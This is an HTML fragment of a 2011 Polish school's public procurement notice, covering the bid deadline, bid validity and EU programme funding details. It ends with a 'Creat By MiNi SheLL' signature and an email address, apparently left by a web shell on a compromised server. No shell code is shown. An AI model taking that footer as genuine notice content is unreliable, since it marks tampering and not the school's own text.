<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2011 godzina 11:00, miejsce: Zespół Szkół Ponadgimnazjalnych Nr 2 im. St. Staszica, 97-200 Tomaszów Maz. ul. Św. Antoniego 57,61    pokój nr 1.2. I piętro Sekretariat, budynek A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pn.: Szansa na przyszłość realizowany przez Zespół Szkół Ponadgimnazjalnych nr 2 im. St. Staszica w Tomaszowie Mazowieckim w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX- Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, na podstawie umowy nr UDA-POKL.09.02.00-10-01 11-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com